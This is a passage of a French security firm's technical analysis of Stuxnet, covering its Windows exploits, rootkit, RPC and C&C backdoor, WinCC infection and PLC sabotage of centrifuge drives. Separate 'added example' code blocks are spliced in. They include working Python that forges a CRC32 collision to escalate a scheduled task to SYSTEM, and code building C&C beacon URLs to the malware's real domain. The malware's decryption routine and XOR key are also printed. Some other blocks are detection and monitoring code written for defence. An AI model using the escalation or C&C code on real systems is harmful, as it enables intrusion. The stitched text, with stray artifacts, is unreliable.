One unknown remains. According to Microsoft, these two vulnerabilities respectively affect Windows XP and 2000 for the keyboard layout, and Windows Vista, 7 and 2008 for the task scheduler. It would therefore appear that the technique used by Stuxnet to install itself on Windows Server 2003 is unknown, or that the malware excludes this platform from its targets.
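The collision the text describes needs no brute force, because CRC32 is linear: for any gap of four bytes in a file, the bytes that steer the checksum to a chosen value can be computed directly. The following Python is an added example written for this article, not code taken from Stuxnet or from Microsoft. The task XML is a simplified, constructed sample (real task files carry a namespace and many more fields), and hiding the correction inside an XML comment, with a nonce varied until the four bytes are printable, is this example's own choice so that the forged file still parses.

```python
"""Forging a CRC32 collision on a modified Task Scheduler XML file (added example)."""
import xml.etree.ElementTree as ET
import zlib
from typing import List

CRC_POLY = 0xEDB88320   # reflected CRC-32 polynomial, as used by zlib and by the task file check
MASK = 0xFFFFFFFF


def make_table() -> List[int]:
    """Standard byte-wise CRC-32 lookup table."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ CRC_POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = make_table()
# The top byte of each table entry is unique, which is what lets the CRC
# register be walked backwards one byte at a time.
REV_TOP = {entry >> 24: i for i, entry in enumerate(TABLE)}


def register_after(data: bytes) -> int:
    """CRC register after feeding data (zlib's value before the final XOR)."""
    return zlib.crc32(data) ^ MASK


def register_before(reg_after: int, suffix: bytes) -> int:
    """Register value that yields reg_after once the known bytes of suffix are fed."""
    reg = reg_after
    for b in reversed(suffix):
        idx = REV_TOP[reg >> 24]
        reg = (((reg ^ TABLE[idx]) << 8) & MASK) | ((idx ^ b) & 0xFF)
    return reg


def patch_bytes(reg_from: int, reg_to: int) -> bytes:
    """The 4 bytes that move the CRC register from reg_from to reg_to."""
    idx = [0] * 4
    reg = reg_to
    for k in range(3, -1, -1):          # recover the table indices, last byte first
        idx[k] = REV_TOP[reg >> 24]
        reg = ((reg ^ TABLE[idx[k]]) << 8) & MASK
    out = bytearray()
    reg = reg_from
    for k in range(4):                  # replay forwards to pick the actual bytes
        out.append((reg ^ idx[k]) & 0xFF)
        reg = TABLE[idx[k]] ^ (reg >> 8)
    return bytes(out)


def forge_task(original: bytes, modified: bytes, max_tries: int = 100_000) -> bytes:
    """Return `modified` plus an XML comment such that its CRC32 equals that of
    `original`. The nonce is varied until the 4 correction bytes are printable
    and contain no '-', so the comment stays well-formed XML."""
    target_reg = zlib.crc32(original) ^ MASK
    head, tail = modified.rsplit(b"</Task>", 1)
    tail = b"</Task>" + tail
    for n in range(max_tries):
        prefix = head + b"<!-- %08d " % n
        suffix = b" -->\n" + tail
        patch = patch_bytes(register_after(prefix), register_before(target_reg, suffix))
        if all(0x20 <= b < 0x7F and b != 0x2D for b in patch):
            return prefix + patch + suffix
    raise RuntimeError("no printable correction found")


def task_crc(data: bytes) -> int:
    """The check as the text describes it: a plain CRC32 of the XML file."""
    return zlib.crc32(data)


def is_well_formed(data: bytes) -> bool:
    try:
        ET.fromstring(data)
        return True
    except ET.ParseError:
        return False


# Constructed sample: the task as a low-privileged user is allowed to create it ...
ORIGINAL_TASK = b"""<?xml version="1.0"?>
<Task version="1.2">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-21-1111-2222-3333-1001</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\payload.exe</Command></Exec>
  </Actions>
</Task>
"""
# ... and the same file after editing the two fields the text mentions (user and privilege level).
ELEVATED_TASK = (ORIGINAL_TASK
                 .replace(b"S-1-5-21-1111-2222-3333-1001", b"S-1-5-18")
                 .replace(b"LeastPrivilege", b"HighestAvailable"))
```

Calling forge_task(ORIGINAL_TASK, ELEVATED_TASK) returns the elevated definition with a trailing comment whose last four characters bring the CRC32 back to the original value; the same patch_bytes primitive works for any 4-byte gap, which is why replacing the CRC with SHA-256 was the only real fix.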

Ludo Benoit



Functioning of the malware
The malware consists of several files. The main module, a DLL, is packed with UPX. This module is executed at the start of any attempt at compromise, whatever the vector (USB drive, network or SQL). As explained above, the malware uses four zero-day Windows vulnerabilities to spread through different vectors (USB and local network). All of these techniques serve to install it on a system. In the most common case, infection by opening a directory on a USB drive, exploitation of the LNK vulnerability launches the execution of the main module.

Functionalities provided
Among other things, execution of this module sets up a user-mode rootkit to hide the malicious files present on the USB drive. To do this, certain system functions exported by the shared libraries "ntdll.dll" and "kernel32.dll" are hooked, both to allow code injection and to hide the malicious files according to specific criteria (".lnk" files with a size of 4,171 bytes, and "~WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0). The malware is capable of injecting executable code into running processes, or into a process whose name corresponds to that of an antivirus program. These operations mean that it never needs to load a file from disk that would risk being detected by an antivirus program.


Several other functionalities useful to the malware's proliferation have been added by its designers. Among these are functionalities allowing it to spread, to hide itself and lastly to update itself. These correspond, overall, to the 21 functions exported by Stuxnet's main module:
- Function 1: infect removable media and launch the RPC server;
- Function 2: hook calls to certain functions in order to infect the .S7P and .MCP files of Step 7 projects;
- Function 4: initiate the Stuxnet uninstallation procedure;
- Function 5: check that the kernel driver MrxCls.sys is correctly installed;
- Functions 6 and 7: return the version of Stuxnet installed;
- Functions 9, 10 and 31: update the malware from Step 7 files;
- Function 14: infect Step 7 files;
- Function 15: entry point of the system-infection routine;
- Function 16: infect the system (installation of drivers, DLLs and resources, code injection, etc.);
- Function 17: replace a Step 7 DLL so as to be able to hook calls to certain functions;
- Function 18: complete uninstallation of the malware;
- Function 19: infect a USB drive;
- Function 22: infect remote systems via the local network;
- Function 24: check the Internet connection;
- Function 27: RPC server;
- Function 28: communicate with the command and control (C&C) server;
- Function 29: communicate with the C&C server and execute the code returned;
- Function 32: RPC server used by the services process to respond to certain RPC calls.
Several network functionalities are implemented within the malware, among them the RPC client and server. P2P communications and the use of a C&C are mainly used to keep the malware up to date and to retrieve information. Nevertheless, they could also be used to download and install other malware or to exfiltrate sensitive information stolen from the compromised system.



Installation of an RPC server
The RPC server is split into two components handling local and remote RPC calls. For this, Stuxnet infects different processes according to the type of RPC call to be handled: "services.exe" for local calls, or one of the processes "netsvc", "rpcss" or "browser" for remote RPC calls. The various RPC methods are as follows:
- Method 1: returns the version of Stuxnet;
- Method 2: loads the module passed as a parameter in a new process and executes the specified exported function;
- Method 3: loads the module passed as a parameter into the memory space of the current process and calls its first exported function;
- Method 4: loads the module passed as a parameter into a new process and executes it;
- Method 5: creates a "dropper" and sends it to a compromised system;
- Method 6: executes the specified application;
- Method 7: reads data from the specified file;
- Method 8: writes data into the specified file;
- Method 9: deletes a file;
- Method 10: performs various tasks based on the names of files intercepted by the hooks installed by "Method 2", and writes the information into a log file.
It appears that the last three methods implemented are not used by Stuxnet. Thanks to this RPC mechanism, which is used for P2P communications, Stuxnet is able, among other things, to update itself on a local network from another compromised system.

C&C communications
The second network-related functionality is a module for communicating with one of the command and control (C&C) servers. Like the "P2P over RPC" function, this module allows a compromised system to load malicious code into memory and execute it. The list of command and control servers is specified in the configuration file "%WINDIR%\inf\mdmcpq3.pnf". This 1,860-byte file may be decrypted with the following function:


# Decryption routine for mdmcpq3.pnf (Python)
def decrypt(key, counter, sym):
    # key and counter feed a small 16-bit pseudo-random generator;
    # the byte it produces is XORed with the ciphertext byte sym
    v0 = key * counter
    v1 = v0 >> 0xb
    v1 = (v1 ^ v0) * 0x4e35
    v2 = v1 & 0xffff
    v3 = v2 * v2
    v4 = v3 >> 0xd
    v5 = v3 >> 0x17
    xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff
    xorbyte = xorbyte ^ ((v2 >> 8) & 0xff)
    xorbyte = xorbyte ^ (v2 & 0xff)
    return xorbyte ^ sym

This file contains several items of information: the list of servers used to check the Internet connection ("www.windowsupdate.com", "www.msn.com"); the list of C&C servers ("www.mypremierfutbol.com", "www.todaysfutbol.com"); the activation and deactivation dates and times of the worm, after which the worm uninstalls itself automatically using the functions mentioned above; the version of the malware; the minimum number of files that a USB drive must contain for it to be infected with the malicious LNK files; and lastly, other ancillary information used for the correct functioning of the worm and its propagation.

Concerning the way the C&C servers operate, an instance of Stuxnet does not exchange plaintext messages with the two servers mentioned above. Each message sent over the Internet to the servers is encrypted with a very simple algorithm: a plain XOR with the following 31-byte key:
// Encryption key (31 bytes)
char Key[31] = {
    0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6,
    0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
    0x88, 0x5A, 0x5C, 0xB0, 0x6E, 0x45, 0x56, 0x1A,
    0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1
};

// Encryption procedure: byte-wise XOR with the key, which repeats every 31 bytes
void EncryptData(char *Buffer, int BufferSize, char *Key)
{
    for (int i = 0; i < BufferSize; i++)
        Buffer[i] ^= Key[i % 31];
}
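To make the exchange concrete, the following Python is an added example, not code from the article or from the malware. It uses only what the text gives: the 31-byte XOR key above and the reply layout described further on (a 4-byte size, a 1-byte flag, then the executable image, accepted only when the total length equals size + 5). The little-endian byte order of the size field, the hex encoding of the "data" parameter and the contents of the sample beacon are assumptions made for the illustration.

```python
"""Stuxnet C&C transport: XOR keying of the beacon and framing of the reply (added example)."""
import struct
from typing import Optional, Tuple

# The 31-byte static key given in the text.
KEY = bytes([0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6,
             0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
             0x88, 0x5A, 0x5C, 0xB0, 0x6E, 0x45, 0x56, 0x1A,
             0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1])


def xor_with_key(buf: bytes) -> bytes:
    """Symmetric: the same call encrypts a beacon and decrypts a captured one."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(buf))


def build_beacon_url(host: str, beacon: bytes) -> str:
    """URL of the shape the text quotes (index.php?data=...). Hex encoding of the
    encrypted beacon is an assumption, not the real on-the-wire format."""
    return f"http://{host}/index.php?data={xor_with_key(beacon).hex()}"


def decode_beacon_param(data_param: str) -> bytes:
    """Inverse of build_beacon_url, as an analyst would apply it to a proxy log."""
    return xor_with_key(bytes.fromhex(data_param))


def build_reply(flag: int, image: bytes) -> bytes:
    """Reply as the text describes it: 4-byte size, 1-byte flag, executable image.
    Little-endian size is assumed."""
    return struct.pack("<I", len(image)) + bytes([flag & 0xFF]) + image


def parse_reply(reply: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (flag, image), or None when the length check from the text fails:
    the message must be exactly size + 5 bytes long, otherwise it is ignored."""
    if len(reply) < 5:
        return None
    (size,) = struct.unpack_from("<I", reply, 0)
    flag = reply[4]
    if len(reply) != size + 5:
        return None
    return flag, reply[5:]


# Constructed sample beacon: OS version and a MAC address, NUL separated.
# The real message layout (interfaces, OS and malware versions, ...) is not reproduced here.
SAMPLE_BEACON = b"\x01\x00" + b"5.1.2600" + b"\x00" + b"00:11:22:33:44:55" + b"\x00"
```

A fixed key that repeats every 31 bytes means the first 31 plaintext bytes of any beacon are recoverable from a single capture once the key is known, and a response whose declared size disagrees with its length is simply dropped, which is the behaviour the text attributes to the malware.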



The structure of a message sent by the malware is quite complex. It contains a lot of information specific to the victim, including details of the network interfaces and the versions of the OS and of the malware. This message is simply sent to a server in an HTTP GET request to one of the URLs listed in the configuration file, for example: http://www.mypremierfutbol.com/index.php?data=STUXNET_CC_MESSAGE. In response to this request, the server returns a message composed of several items: a size encoded over 4 bytes, a flag encoded over 1 byte and lastly an executable image. If the size of the received message does not correspond to the indicated image size + 5 bytes, the malware ignores the response. If the size matches, then depending on the value of the flag, the malware loads the executable image into the memory space of the current process or into another process using one of the dedicated RPC methods, then executes it. It nevertheless appears that this important functionality has not really been used, either to update the malware or to install additional malicious tools. It does however constitute a backdoor. The rapid blocking of the domains www.mypremierfutbol.com and www.todaysfutbol.com may have played a part in this.

Seeking and infecting the WinCC environment
Lastly, to maximize the efficiency of the proliferation operation, the malware searches for the WinCC software. Once it is found, Stuxnet connects to the database used by the software, using a standard hard-coded password. Once connected to this database, the malware uploads its malicious code via SQL queries, then executes it. This first action compromises the MSSQL server. Next, the malware modifies SQL views defined on the server to force the execution of code each time these views are accessed. Stuxnet is lastly capable of infecting the WinCC / Step 7 projects managed with the WinCC Simatic Manager.

The files sought and modified have the extensions .S7P, .MCP or .TMP. Under certain specific conditions, files named "xutils\listen\xr000000.mdx", "xutils\links\s7p00001.dbf" and "xutils\listen\s7000001.mdx", or "GracS\cc_alg.sav", "GracS\db_log.sav" and "GracS\cc_tag.sav", are dropped. In both cases, these files correspond respectively to an encrypted version of the malware's main DLL, to a 90-byte data file and lastly to an encrypted version of Stuxnet's configuration data block. Lastly, a specially crafted DLL is placed in several sub-directories of the "hOmSave7" directory. The infection mechanism is relatively simple: when the project is opened with the WinCC Simatic Manager, the DLL placed in the sub-directories of "hOmSave7" is automatically looked up. When it is loaded, the library decrypts the protected data and loads the malware's main component into memory to complete the infection.

Persistence
To ensure the persistence of the functionalities installed previously, Stuxnet nevertheless has to modify the system deeply: it is not possible to inject code into arbitrary processes or to durably hide files from user mode without such modifications. Two kernel drivers, signed with private keys corresponding to certificates belonging to Realtek and JMicron, are therefore installed using the elevated privileges obtained from the two exploits (keyboard layout and task scheduler). "MrxCls.sys" is used to inject code into processes. "MrxNet.sys" is a rootkit that hides the malicious files used to exploit the LNK vulnerability. Unlike the user-mode rootkit, this one is persistent. The fact that these drivers are signed with stolen certificates means that they can be installed more discreetly, without arousing the user's suspicion (a valid signature is required for loading drivers on 64-bit Windows Vista/Windows 7). The ".lnk" files with a size of 4,171 bytes and the "~WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0 are filtered out so that they are not displayed by the file explorer. This filter is only active for the NTFS, FAT and CDFS file systems. After registering with the kernel function "IoRegisterFsRegistrationChange()", the driver is notified each time a file system becomes active and can then attach to it and monitor the requests sent to it. The driver can thus act with complete impunity and choose which files to display in a directory.
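The hiding criteria above (the same ones the user-mode hooks in the main module apply) double as a hunting rule, and because the filter only lies to the Windows API, a raw read of the volume shows what Explorer does not. The following Python is an added example written for this article, not a vendor tool: the directory listings are constructed sample data with placeholder sizes, the 4,171-byte shortcut size and the digit-sum rule come from the text, and the project-file check uses the Step 7 / WinCC artefact names quoted in the previous section.

```python
"""Hunting for the files that Stuxnet's rootkit hides (added example)."""
import re
from typing import List, Tuple

LNK_SIZE = 4171                      # size of the malicious shortcuts quoted in the text
WTR_NAME = re.compile(r"^~WTR(\d)(\d)(\d)(\d)\.tmp$", re.IGNORECASE)

# Step 7 / WinCC project artefacts named in the text (paths relative to the project directory).
PROJECT_IOCS = (
    r"xutils\listen\xr000000.mdx",
    r"xutils\links\s7p00001.dbf",
    r"xutils\listen\s7000001.mdx",
    r"GracS\cc_alg.sav",
    r"GracS\db_log.sav",
)


def hidden_by_stuxnet(name: str, size: int) -> bool:
    """True if the rootkit filter described in the text would hide this entry."""
    if name.lower().endswith(".lnk") and size == LNK_SIZE:
        return True
    m = WTR_NAME.match(name)
    if m and sum(int(d) for d in m.groups()) % 10 == 0:   # a+b+c+d mod 10 == 0
        return True
    return False


def scan_listing(listing: List[Tuple[str, int]]) -> List[str]:
    """Names in a (name, size) listing that match the hiding rule."""
    return [name for name, size in listing if hidden_by_stuxnet(name, size)]


def cross_view_diff(api_view: List[Tuple[str, int]],
                    raw_view: List[Tuple[str, int]]) -> List[str]:
    """Cross-view check: names present in a raw read of the volume but missing
    from what the (hooked) Windows API reports. Anything here is hidden."""
    seen = {name.lower() for name, _ in api_view}
    return [name for name, _ in raw_view if name.lower() not in seen]


def project_iocs(paths: List[str]) -> List[str]:
    """Project-relative paths matching the Step 7 / WinCC artefacts from the text,
    plus any DLL sitting under an hOmSave7 directory."""
    wanted = {p.lower() for p in PROJECT_IOCS}
    hits = [p for p in paths if p.lower() in wanted]
    for p in paths:
        parts = p.lower().split("\\")
        if "homsave7" in parts[:-1] and parts[-1].endswith(".dll"):
            hits.append(p)
    return hits


# Constructed sample: a raw parse of the USB volume's FAT (placeholder sizes) ...
RAW_USB_VIEW = [
    ("Copy of Shortcut to.lnk", 4171),
    ("Copy of Copy of Shortcut to.lnk", 4171),
    ("~WTR4141.tmp", 25720),
    ("~WTR4132.tmp", 513536),
    ("report.docx", 88124),
    ("notes.lnk", 920),
    ("~WTR1235.tmp", 4096),
]
# ... and what FindFirstFile/FindNextFile return on an infected host for the same drive.
API_USB_VIEW = [
    ("report.docx", 88124),
    ("notes.lnk", 920),
    ("~WTR1235.tmp", 4096),
]
```

On a suspect host the raw view would come from a disk image or a boot from clean media; on a clean host the two views agree and cross_view_diff returns nothing, which is exactly what makes the comparison a usable rootkit check.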


1: The attacker manages to inf-ect a USB drive used by a person working on a computer connected to the target information system.
2: The person uses their USB drive within the target information system's LAN.
3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.
4: Stuxnet contacts its C&C server.
5: An employee whose USB drive has been contaminated connects it to a workstation equipped with the WinCC software and belonging to an industrial network.
6: When this contaminated workstation connects to a PLC, Stuxnet deposits its malicious code on the PLC.
7: The malicious code sends specific orders to the variable frequency drives.
7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet.



The resources embedded by Stuxnet
The two previously mentioned drivers correspond respectively to resources 201 and 242 of the main module. Eleven other resources are also present, such as a PE executable module (210), an LNK file (240) and a block of configuration data for the driver "MrxCls.sys" (205):
- Resource 201: driver "MrxCls.sys", signed using certificates belonging to Realtek or JMicron;
- Resource 202: DLL used in compromising Step 7 projects;
- Resource 203: CAB file containing an equivalent of resource 202, used for compromising WinCC projects;
- Resource 205: encrypted configuration-data file for the driver "MrxCls.sys";
- Resource 208: shared library "s7otbxdx.dll" usurping the functions of the original Siemens DLL;
- Resource 209: 25-byte file containing encrypted data, dropped in "%WINDIR%\help\winmic.fts";
- Resource 210: PE file template used for creating or injecting executables ("~WTR4132.tmp");
- Resource 221: malicious code used to exploit the vulnerability in the server service (MS08-067);
- Resource 222: malicious code used to exploit the vulnerability in the print spooler (MS10-061);
- Resource 240: LNK file template;
- Resource 241: "~WTR4141.tmp", DLL used to load the executable corresponding to resource 210, "~WTR4132.tmp", which is responsible for installing the malware (dropper);
- Resource 242: driver "MrxNet.sys" (rootkit), used to hide the presence of certain files;
- Resource 250: malicious code used to exploit the vulnerability in keyboard layout handling (MS10-073).
The following resources were observed by Symantec in older versions of Stuxnet, but have disappeared from the "latest" versions:
- Resource 207: information related to the exploitation of a vulnerability using Autorun.inf;
- Resource 231: resource used to check whether or not the system is connected to the Internet.

INFO
Definitions
PLC: Programmable Logic Controller. A programmable controller is a programmable electronic device for controlling industrial processes by sequential processing. It sends orders to the pre-actuators (operative section, on the actuator side) based on input data from sensors (control section, on the sensor side), instructions and a computer program.
SCADA: Supervisory Control And Data Acquisition. Large-scale remote-control system for the real-time processing of a large number of remote measurements and for the remote control of technical facilities. It is an industrial technology in the field of instrumentation.



Phase 3: Attack on industrial systems
Detection of SCADA systems based on WinCC
Once the Windows system has been compromised and the malware installed, the third phase of the attack can begin: the search for certain specific software. To reach the SCADA system, the authors of the malware chose to go through the engineering tools associated with the target system, Step 7 and WinCC. These two tools are used respectively to develop the programs running on PLCs and to supervise their operation. Incidentally, these tools are potentially the only point of entry to these sensitive systems, since they are not supposed to be connected to the Internet, but only to a network dedicated to them.

To carry out this third phase of the attack, the malware searches for and replaces the shared library "s7otbxdx.dll". This library, which comes from the Siemens Simatic software suite, is used to let a Windows PC communicate with a PLC of the Simatic family. Usually, a developer programs the equipment in one of the languages supported by the software suite, such as STL or SCL. This is then compiled into a specific low-level code called "MC7" before being loaded onto the PLC. By renaming the shared library "s7otbxdx.dll" to "s7otbxsx.dll", then putting its own version of "s7otbxdx.dll" in its place, the malware is able to intercept all calls to the functions exported by the original library and to manipulate them at will. In fact, only the behaviour of a few functions is affected: most calls to the functions of "s7otbxdx.dll" are forwarded directly to the equivalent functions in "s7otbxsx.dll".


The 16 functions whose behaviour is altered correspond to the methods for reading ("s7blk_read"), writing ("s7blk_write"), enumerating ("s7blk_findfirst" and "s7blk_findnext") and deleting ("s7blk_delete") the code blocks present on the PLC. It is by modifying these key functions of the library that the attackers ensure the persistence and discretion of their attack. To avoid detection when an operator connects to a compromised PLC, the "read" and "enumeration" functions hide certain code blocks from the operator and only return the original "healthy" code.

But not all PLCs are targeted. Stuxnet, using two threads launched by the malicious library, looks for precisely two types of device, with the references Siemens 6ES7-315-2 and 6ES7-417. The main difference between these two models of controller is the amount of embedded memory: 256 KB for the S7-315 series against 30 MB for the S7-417 series.

Module 315
In the configuration targeted by the malware, the PLCs of the 300 series (6ES7-315-2) must use between one and six Profibus CP 342-5 modules to communicate with the systems under their control. Once again, only certain identification numbers are sought. In the case of Stuxnet, these are the Profibus identification numbers "7050h" and "9500h". These numbers uniquely identify the models of the equipment, which are known as "frequency converter drives" or "variable frequency drives". The corresponding products are the "KFC750V3" manufactured by Fararo Paya, based in Tehran in Iran, and the "Vacon NX" from Vacon, based in Finland.

This document is the property of XMCO Partners. Any reproduction is !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![22] strictly prohibited.

WWW.XMCO.FR

STUXNET PART II: TECHNICAL ANALYSIS


Variable frequency drives are generally used to control the speed of other components such as motors. Finally, the last criterion sought is the presence of at least 33 variable frequency drives among the two models previously mentioned.

If these various extremely precise conditions are fulfilled, the process of infection begins with the modification of certain blocks of code such as DP_RECV, OB1 and OB35. These blocks of code are infected by overwriting or by increasing their sizes in order to introduce the malicious code at the beginning of the block. These operations ensure that the added code is executed when the block in question is called. The functions FC1865 and FC1874 are therefore respectively injected into blocks OB1 and OB35.

Note: DP_RECV corresponds to the function in charge of managing the reception of data on the bus. OB1 corresponds to the main function, which is continuously executed. OB35 corresponds to a timer executed every 100 ms.

In reality, Stuxnet may infect systems that match its selection criteria in different ways. This is because two sequences of malicious code exist and may be used to infect a PLC according to the distribution of the products that are controlled. The first sequence, referenced A by Symantec, is selected when there is a majority of Vacon devices. The second sequence, referenced B by Symantec, is used when a majority of Fararo Paya variable frequency drives are present. In all cases, the 315 module is designed to allow a 6ES7-315-2 PLC to control up to six Profibus "masters", each controlling 31 "slave" converters, each on its own dedicated Profibus network.

Finally, attack 315, which corresponds to about 3,000 lines of STL code accompanied by 4 data blocks (DB888, DB889, DB890 and DB891), is organized as follows: the code block DP_RECV is copied to the address FC1869, then replaced by malicious code which itself calls the original code that was moved. Each time a variable frequency drive sends data to a 6ES7-315-2 PLC via the Profibus CP 342-5 module, its data is transferred to the original code before being reprocessed by the added malicious code. Each of the messages to be processed must be in a specific format when it is examined by DP_RECV. Namely, it must be composed of 31 records of 28 or 32 bytes corresponding to each of the converters.


Subsequently, the system goes into a state machine clearly described by Symantec. The transition between each state is governed by timers, tests or by the end of other tasks. Roughly, the system collects data for a period of between 13 days and three months, before sending falsified data on the communication bus for about 50 min, then returning to the initial state. According to Symantec's study, the system uses DP_RECV to inspect the messages sent by the variable frequency drives, which contain specific information corresponding to the current operating frequency.

Lastly, this attack allows a pirate who has successfully injected their malicious code to withdraw the control that the legitimate blocks of code had over the data transmitted during the phase nicknamed "deadfoot" ("DEADF007" in the code). This phase corresponds to 50 min during which the PLC sends semi-arbitrary information to the various variable frequency drives through the Profibus modules. The messages sent correspond to frequencies that must be converted into rotation speeds by the variable frequency drives. Furthermore, execution of the legitimate code is prevented using a call to the BEC instruction (Conditional Block End) instead of letting the execution of the program continue. Without this, other contradictory information could be sent by the PLCs.

During the offensive phase, during which the falsified messages are sent, the orders given allow the attackers to vary the rotation speed of the motors in stages. In sequence A, when there are more Vacon variable frequency drives, the first stage is placed at 1,410 Hz. This is then lowered to 2 Hz before being increased to 1,064 Hz. These large variations probably cause material damage to the motors, which are supposed to turn at frequencies of between 807 and 1,210 Hz.
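As an added example (not code from the article, Symantec or Langner), here is an out-of-band plausibility check a defender could run on the setpoints a PLC hands to its drives, built from the figures quoted above: the nominal 807 to 1,210 Hz band, the sequence A stages of 1,410 Hz, 2 Hz and 1,064 Hz, and the 31-record frame shape DP_RECV expects. The 200 Hz maximum step between consecutive samples and the sample series are assumptions.

```c
/* Added example, not part of the XMCO article: an independent monitor for the
 * frequency setpoints a PLC sends to its variable frequency drives. A monitor
 * that does not trust the PLC's own telemetry is one way to notice the
 * "deadfoot" phase, in which the converters are driven far outside their band. */
#include <stddef.h>
#include <stdio.h>

/* Nominal operating band quoted in the article (Hz). */
#define FREQ_MIN_HZ 807.0
#define FREQ_MAX_HZ 1210.0
/* Assumed: largest plausible change between two consecutive setpoints. */
#define MAX_STEP_HZ 200.0

/* Frame shape the malicious DP_RECV is written to parse: 31 records of 28 or 32 bytes. */
#define DP_RECORDS 31
#define DP_RECORD_SHORT 28
#define DP_RECORD_LONG 32

enum freq_verdict { FREQ_OK = 0, FREQ_OUT_OF_BAND = 1, FREQ_STEP_TOO_LARGE = 2 };

typedef struct {
    double last_hz;
    int have_last;
    int alerts;
} freq_monitor;

void freq_monitor_init(freq_monitor *m) {
    m->last_hz = 0.0;
    m->have_last = 0;
    m->alerts = 0;
}

/* Classify one commanded frequency. Out-of-band values are flagged first; an
 * in-band value is still suspicious if it jumps too far from the previous one. */
enum freq_verdict freq_check(freq_monitor *m, double hz) {
    enum freq_verdict v = FREQ_OK;
    if (hz < FREQ_MIN_HZ || hz > FREQ_MAX_HZ) {
        v = FREQ_OUT_OF_BAND;
    } else if (m->have_last) {
        double step = hz - m->last_hz;
        if (step < 0) step = -step;
        if (step > MAX_STEP_HZ) v = FREQ_STEP_TOO_LARGE;
    }
    m->last_hz = hz;
    m->have_last = 1;
    if (v != FREQ_OK) m->alerts++;
    return v;
}

/* Returns 1 if a bus message has exactly the shape DP_RECV expects
 * (31 records, all 28 bytes or all 32 bytes), otherwise 0. */
int dp_frame_shape_matches(size_t len) {
    return len == DP_RECORDS * DP_RECORD_SHORT || len == DP_RECORDS * DP_RECORD_LONG;
}

/* Runs the monitor over a series of setpoints and returns the alert count. */
int freq_monitor_run(const double *hz, size_t n) {
    freq_monitor m;
    size_t i;
    freq_monitor_init(&m);
    for (i = 0; i < n; i++) {
        enum freq_verdict v = freq_check(&m, hz[i]);
        if (v != FREQ_OK)
            printf("sample %zu: %.0f Hz -> %s\n", i, hz[i],
                   v == FREQ_OUT_OF_BAND ? "outside 807-1210 Hz" : "step too large");
    }
    return m.alerts;
}

int main(void) {
    /* Constructed series: steady operation, then the sequence A stages. */
    const double samples[] = { 1000.0, 1007.0, 1410.0, 2.0, 1064.0, 1064.0 };
    int alerts = freq_monitor_run(samples, sizeof samples / sizeof samples[0]);
    printf("%d alert(s)\n", alerts);
    return 0;
}
```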


Module 417

Another sequence of the malicious code is dedicated to PLCs referenced 6ES7-417. The code composing this sequence is more complex than that which targets the 300-series PLCs. This module 417 is broken down into nearly 12,000 lines of STL code, accompanied by 10 data blocks, partly loaded by the malicious DLL and partly generated dynamically. In the same way as for sequence 315, an injection of code into block OB1 ensures that the added malicious functions are called.

Ralph Langner's analysis provides an understanding of the role and functioning of this second sequence of code. According to him, the code added by the attackers to the PLC allows an attack that is much more complex than for module 315. This is because the code in question is used to carry out an attack of the "man-in-the-middle" type on the controller itself. In contrast to the previous sequence, for which the principle was based on modifying the results returned using a conditional jump (BEC) to prevent the execution of the original code, the purpose of this code sequence is to intercept the input/output signals to/from the PLC and to supply falsified pre-recorded values to the code in charge of the logic. This trick also allows the signals returned on output to be falsified, to avoid attracting the attention of an operator who might observe dubious signals. As the researcher emphasized, this attack is worthy of a Hollywood scenario in which the spies repeatedly send the control room images corresponding to what the surveillance cameras should be seeing.

In the same way as for code 315, a state machine can follow the progress of attack 417. During a first phase, the role of the malicious code is to record the values to be subsequently replayed. Several other intermediate states correspond to the offensive phase, during which the pre-recorded data is transmitted to the original logic, while the real data is processed by the malicious code. At the same time, the pirates control the output towards which they send the signals that they wish to send.
Nevertheless, the presence of this code is particularly surprising, given that, according to the study by Symantec, it is not functional. This is because the library in charge of copying the malicious code to the PLC does not copy all of the code needed for the attack to function properly. Among other things, the block OB1, which, as previously, corresponds to the main function that is continuously called by the PLC, is not modified to trigger the call to the malicious functions. Furthermore, still according to Symantec, in contrast to the code of attack 315, the STL code in module 417 contains numerous comments and debugging functions that are characteristic of unfinished work.

However, Langner qualified this assumption. This particularly large block of code (about 12,000 lines) could not have been designed for nothing: it is extremely complex code, which would have required significant resources in time, personnel and technology. Furthermore, certain interactions related to this code were also highlighted in his laboratory. The researcher therefore concluded that, based on the study of the code embedded in Stuxnet, it is difficult to know whether or not it was operational in the attack carried out against Natanz, but that it had been deliberately designed that way.

In all cases, module 417 of Stuxnet, just like module 315, seeks a SCADA architecture that meets certain very precise constraints. These are six assemblies each containing 164 centrifuges. This condition was deduced by Langner from function FC 6069, which is used to store 984 (6 * 164) entries in data block DB 8063.


Destruction/Sabotage

Once Stuxnet has identified and infected its target, the malware then begins a long phase during which slight variations will lead to a probable destruction of equipment, and above all to a reduction in the yield of the enrichment process. According to Ralph Langner, by collecting all the information relating to modules 315 and 417 recovered up to now, it is possible to deduce the precise architecture of the target system. This information comes partly from the study of the STL code and the functions implemented, partly from the data that is processed, and lastly from scientific data on the functioning of a nuclear enrichment centre.

A cascade of gas centrifuges is an assembly of 164 centrifuges placed one after the other. The first handles the gas, then when its task is finished, it sends the gas into the second, and so on. To improve the yield of these cascades, physicists have discovered a specific assembly in which a cascade is divided into "stages". Each of these "stages" in the cascade is composed of one or more centrifuges, according to its location. Thus, the various stages are in series, while the centrifuges that compose them are placed in parallel. This cascade architecture, when it is correctly chosen, maximizes the quantity of enriched uranium produced.

